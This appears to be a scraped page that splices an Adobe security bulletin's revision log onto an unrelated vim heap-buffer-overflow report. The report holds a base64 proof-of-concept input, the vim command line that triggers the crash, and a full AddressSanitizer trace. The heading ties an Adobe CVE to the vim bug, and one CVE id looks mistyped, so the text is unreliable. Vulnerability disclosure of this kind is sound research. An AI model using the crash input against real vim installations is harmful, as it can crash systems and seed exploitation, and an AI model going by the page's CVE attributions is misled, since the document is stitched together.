January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706  
January 27th, 2022: Updated acknowledgment for CVE-2021-45067

March 16, 2022: Added CVE details for CVE-2022-24091 and CVE-2022-24092

March 24, 2022: Updated acknowledgements for CVE-2022-44705 and CVE-2022-44707

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-44705: Adobe Security Bulletin

vim is vulnerable to Heap-based Buffer Overflow

**Description**

A Heap-based Buffer Overflow has been found in vim commit 3cf21b3

**Proof of Concept**

    base64 poc
    ZggwMDAwMDAwMDAwMDAwMDAwMBkwMDAwCmYIMDAwMDAwMCUlJSUlJSUlJSUlMDAwMDD8CmUlJSUl
    JSUlJSUlJSUlJQp2cwp2MP8wbwo=
    

    ~/fuzzing/vim/vim/src/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
    

ASan stack trace:

    =================================================================
    ==1771749==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000c500 at pc 0x000000430759 bp 0x7fff2b54f4d0 sp 0x7fff2b54ec90
    READ of size 1 at 0x62100000c500 thread T0
        #0 0x430758 in strlen (/home/aidai/fuzzing/vim/vim/src/vim+0x430758)
        #1 0x5dfe7d in win_redr_status /home/aidai/fuzzing/vim/vim/src/drawscreen.c:496:18
        #2 0x5e6c60 in redraw_statuslines /home/aidai/fuzzing/vim/vim/src/drawscreen.c:3243:6
        #3 0xf70031 in main_loop /home/aidai/fuzzing/vim/vim/src/main.c:1401:6
        #4 0x707866 in do_exedit /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:6967:3
        #5 0x715673 in ex_open /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:6902:5
        #6 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #7 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #8 0x6cf415 in global_exe_one /home/aidai/fuzzing/vim/vim/src/ex_cmds.c
        #9 0x6cf87e in global_exe /home/aidai/fuzzing/vim/vim/src/ex_cmds.c:5045:2
        #10 0x6cecac in ex_global /home/aidai/fuzzing/vim/vim/src/ex_cmds.c:5006:6
        #11 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #12 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #13 0xb6bec7 in do_source /home/aidai/fuzzing/vim/vim/src/scriptfile.c:1511:5
        #14 0xb6a05f in cmd_source /home/aidai/fuzzing/vim/vim/src/scriptfile.c:1098:14
        #15 0x6e9395 in do_one_cmd /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:2573:2
        #16 0x6dc217 in do_cmdline /home/aidai/fuzzing/vim/vim/src/ex_docmd.c:993:17
        #17 0xf6d3b3 in exe_commands /home/aidai/fuzzing/vim/vim/src/main.c:3084:2
        #18 0xf6d3b3 in vim_main2 /home/aidai/fuzzing/vim/vim/src/main.c:774:2
        #19 0xf69bdf in main /home/aidai/fuzzing/vim/vim/src/main.c:426:12
        #20 0x7f8ccafc20b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #21 0x41db2d in _start (/home/aidai/fuzzing/vim/vim/src/vim+0x41db2d)
    
    0x62100000c500 is located 0 bytes to the right of 4096-byte region [0x62100000b500,0x62100000c500)
    allocated by thread T0 here:
        #0 0x49626d in malloc (/home/aidai/fuzzing/vim/vim/src/vim+0x49626d)
        #1 0x4c5d75 in lalloc /home/aidai/fuzzing/vim/vim/src/alloc.c:248:11
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/vim/src/vim+0x430758) in strlen
    Shadow bytes around the buggy address:
      0x0c427fff9850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fff98a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1771749==ABORTING

Tag

#buffer_overflow